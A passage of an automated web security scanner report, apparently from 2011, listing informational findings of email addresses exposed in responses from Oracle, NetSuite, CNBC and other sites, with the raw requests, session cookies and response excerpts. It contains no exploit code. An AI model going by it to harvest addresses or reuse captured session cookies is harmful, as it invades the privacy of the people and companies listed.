Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51608471331278653
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51608471331278653,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Content-Length: 82084
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!-- Page Info -->
       <meta
...[SNIP]...
<a href="ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM">
...[SNIP]...

22.6. http://blogs.oracle.com/otn/feed/entries/atom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/feed/entries/atom

Issue detail

The following email addresses were disclosed in the response:

Request

GET /otn/feed/entries/atom HTTP/1.1
Host: blogs.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/atom+xml; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51818405041022743
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51818405041022743,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Expires: Tue, 06 Sep 2011 17:06:19 GMT
Date: Tue, 06 Sep 2011 17:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123383

<?xml version="1.0" encoding='utf-8'?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="html">Oracle Technology Network Blog (aka TechBlog)</title>
<subtitle type="html">The world&a
...[SNIP]...
<content type="html">&lt;p&gt;Several titles have been added by our book partners this month.&amp;nbsp; Please take a look at the new titles below and then visit the&lt;a href=&quot;ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM&quot;&gt;&lt;/a&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt; &lt;a href=&quot;http://www.oracle.com/technetwork/community/join/member-discounts/index.html&quot;&gt;OTN Member Discount
...[SNIP]...

22.7. http://blogs.oracle.com/otn/feed/entries/rss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/feed/entries/rss

Issue detail

The following email addresses were disclosed in the response:

Request

GET /otn/feed/entries/rss HTTP/1.1
Host: blogs.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/rss+xml; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51528267109800496
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51528267109800496,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Expires: Tue, 06 Sep 2011 17:06:19 GMT
Date: Tue, 06 Sep 2011 17:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116022

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom" >
<channel>
<title>Oracle Technology Network Blo
...[SNIP]...
<description>&lt;p&gt;Several titles have been added by our book partners this month.&amp;nbsp; Please take a look at the new titles below and then visit the&lt;a href=&quot;ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM&quot;&gt;&lt;/a&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt; &lt;a href=&quot;http://www.oracle.com/technetwork/community/join/member-discounts/index.html&quot;&gt;OTN Member Discount
...[SNIP]...

22.8. https://dne.oracle.com/pls/uns/OPT_OUT.th

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dne.oracle.com
Path:   /pls/uns/OPT_OUT.th

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/uns/OPT_OUT.th HTTP/1.1
Host: dne.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:33 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 2648
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Oracle</title>

</head>
<body bgcolor="#FFFFFF">
            <div align="center"><table border="0" width="750" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">


...[SNIP]...
<a href="mailto:UNSUBSCRIBE_US@oracle.com">
...[SNIP]...
<u>UNSUBSCRIBE_US@oracle.com</u>
...[SNIP]...

22.9. http://edge.sapient.com/assets/scripts/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /assets/scripts/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/scripts/global.js HTTP/1.1
Host: edge.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Aug 2011 14:09:36 GMT
Accept-Ranges: bytes
ETag: "010744be75ccc1:27e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 57424
Cache-Control: max-age=62467
Date: Tue, 06 Sep 2011 15:32:21 GMT
Connection: close

.../*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nove
...[SNIP]...
<a class="mailIcon" href="mailto:authorname@sapient.com">
...[SNIP]...

22.10. http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /admin/jscripts/rd_temp_config/1001US_rd_temp_config.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /admin/jscripts/rd_temp_config/1001US_rd_temp_config.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "742b1f-1301e-4e365e61"
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 08:05:53 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=297;ecid=72057811353815560,0)
Content-Length: 77854
Date: Sat, 27 Aug 2011 05:42:18 GMT
Accept-Ranges: bytes

rd_temp_config=new makerd_temp_config();

rd_temp_config.rd_software_downloads="Software Downloads";
rd_temp_config.CERTHeader_Text7="Oracle Practice Tests";
rd_temp_config.CERTHeader_Text6_URL="/glob
...[SNIP]...
<br>";
rd_temp_config.tech_support_sub1_bullet2a="Email:";
rd_temp_config.tech_support_sub1_bullet2b="mailto:olntech_us@oracle.com";
rd_temp_config.tech_support_sub1_bullet2b_url="http://www.oracle.com/us/education/emailus-079096.html";
rd_temp_config.tech_support_sub1_bullet3="Self-Study CD-ROM Support Home<br>
...[SNIP]...
<a href=&quot;mailto:lvcproducer_us@oracle.com&quot;>lvcproducer_us@oracle.com</a>
...[SNIP]...

22.11. http://education.oracle.com/education/jscripts/JSSerializer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/jscripts/JSSerializer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /education/jscripts/JSSerializer.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/searchResult.searchEngineParser
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ETag: "14fa1ed-26a1-4baac79d"
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Mar 2010 02:17:01 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=265;ecid=144115422572057809,0)
Content-Length: 9889
Date: Sat, 03 Sep 2011 05:17:00 GMT
Accept-Ranges: bytes

/*
Copyright 2007 Matt Fellows

Email: Matt.Fellows@onegeek.com.au
Web: http://www.onegeek.com.au

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the F
...[SNIP]...

22.12. http://education.oracle.com/education/jscripts/OUheaderCSS.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/jscripts/OUheaderCSS.js

Issue detail

The following email address was disclosed in the response:

Request

GET /education/jscripts/OUheaderCSS.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "711830-ba55-4e44cc5f"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 06:46:55 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=162;ecid=72057690790184077,1)
Content-Length: 47701
Date: Sat, 27 Aug 2011 05:40:57 GMT
Accept-Ranges: bytes

var terms_flag = 0;
var complete_url = document.location.href;
var loc = complete_url.lastIndexOf("/");
var html_string = complete_url.substring(loc + 1);
if (html_string == "terms_conditions.htm
...[SNIP]...
<a href="mailto:opnbootcamp_ww@oracle.com" target="_blank">
...[SNIP]...

22.13. http://education.oracle.com/education/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /education/jscripts/s_code.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "fc444-755a-4d125392"
Content-Type: application/x-javascript
Last-Modified: Wed, 22 Dec 2010 19:37:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=289;ecid=72057716559994041,1)
Content-Length: 30042
Date: Sat, 27 Aug 2011 05:44:54 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.14. https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /admin/jscripts/rd_temp_config/_rd_temp_config.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /admin/jscripts/rd_temp_config/_rd_temp_config.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "1b0ff33-129b2-4c8dd47d"
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Sep 2010 07:36:29 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=0;ecid=144115375057114538,1)
Content-Length: 76210
Date: Sat, 03 Sep 2011 13:15:46 GMT
Accept-Ranges: bytes

rd_temp_config=new makerd_temp_config();

rd_temp_config.rd_software_downloads="Software Downloads";
rd_temp_config.CERTHeader_Text7="Oracle Practice Tests";
rd_temp_config.CERTHeader_Text6_URL="/glob
...[SNIP]...
<br>";
rd_temp_config.tech_support_sub1_bullet2a="Email:";
rd_temp_config.tech_support_sub1_bullet2b="mailto:olntech_us@oracle.com";
rd_temp_config.tech_support_sub1_bullet2b_url="http://www.oracle.com/us/education/emailus-079096.html";
rd_temp_config.tech_support_sub1_bullet3="Self-Study CD-ROM Support Home<br>
...[SNIP]...
<a href=&quot;mailto:lvcproducer_us@oracle.com&quot;>lvcproducer_us@oracle.com</a>
...[SNIP]...

22.15. https://education.oracle.com/education/jscripts/OUheaderCSS.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /education/jscripts/OUheaderCSS.js

Issue detail

The following email address was disclosed in the response:

Request

GET /education/jscripts/OUheaderCSS.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "711830-ba55-4e44cc5f"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 06:46:55 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=299;ecid=144115379622287656,0)
Content-Length: 47701
Date: Sat, 03 Sep 2011 05:23:01 GMT
Accept-Ranges: bytes

var terms_flag = 0;
var complete_url = document.location.href;
var loc = complete_url.lastIndexOf("/");
var html_string = complete_url.substring(loc + 1);
if (html_string == "terms_conditions.htm
...[SNIP]...
<a href="mailto:opnbootcamp_ww@oracle.com" target="_blank">
...[SNIP]...

22.16. https://education.oracle.com/education/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /education/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /education/jscripts/s_code.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "fc444-755a-4d125392"
Content-Type: application/x-javascript
Last-Modified: Wed, 22 Dec 2010 19:37:54 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=295;ecid=144115323787714372,0)
Content-Length: 30042
Date: Sat, 03 Sep 2011 05:23:14 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.17. http://event.on24.com/r.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.on24.com
Path:   /r.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /r.htm HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 23:44:20 GMT
Accept-Ranges: bytes
Content-Length: 6530
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>

<META HTTP-EQUIV="Content-type" CONTENT="text/html; charset=UTF-8">
<TITLE>Webcasts</TITLE>
<LINK REV="made" href="mailto:jayeshs@on24.com">
...[SNIP]...

22.18. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /app/site/crm/externalleadpage.nl

Issue detail

The following email address was disclosed in the response:

Request

GET /app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
Referer: https://forms.netsuite.com/app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315341196|session#1315341135013-154927#1315342996|PC#1315341135013-154927.19#1316550738; JSESSIONID=fHTcTm9CBLMJTHFQWbd8qqd81sbXKBcbnK8jsyHgY5NlMPHvvBHKrmGY0yLgRhCZjP6LNPZLjV0XY1NCNpVg6LvVX6517ztFTY6nvnmjQQ7bddV4GnyHHGHM5pCXsFhy!1517314966; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:05 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 44621
Expires: 0
NS_RTIMER_COMPOSITE: 668955252:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Eco
...[SNIP]...
s['customform']='';
window.nsDefaultContextObj={"roleid":"online_form_user","location":"0","department":"0","rolecenter":"CUSTOMER","contact":"0","version":"2011.2","environment":"PRODUCTION","email":"onlineformuser@NLCORP.com","name":"-System-","company":"NLCORP","context":"userinterface","role":"31","subsidiary":"1","user":"-4"};
function addShortcut() {
nlOpenWindow('/core/pages/addShortcut.nl?label='+escape('Container')
...[SNIP]...
<!-- [ NLCORP ] [ onlineformuser@NLCORP.com ] [ /app/site/crm/externalleadpage.nl ] [ Tue Sep 06 08:35:06 PDT 2011 ] -->
...[SNIP]...

22.19. https://forums.oracle.com/forums/themes/english/resources/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511"
Content-Type: text/plain
Content-Length: 29511
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.20. https://login.cnbc.com/cas/js/cnbc_login.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/js/cnbc_login.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cas/js/cnbc_login.js HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:34 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
ETag: W/"2685-1313708448000"
Last-Modified: Thu, 18 Aug 2011 23:00:48 GMT
Content-Length: 2685
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/javascript

function requestActivation(){
   top.location.href = activationURL;
}

function finalSubmit(){
var myForm = document.loginForm;
if(validate(myForm)){
myForm.submit();
}
}

function
...[SNIP]...
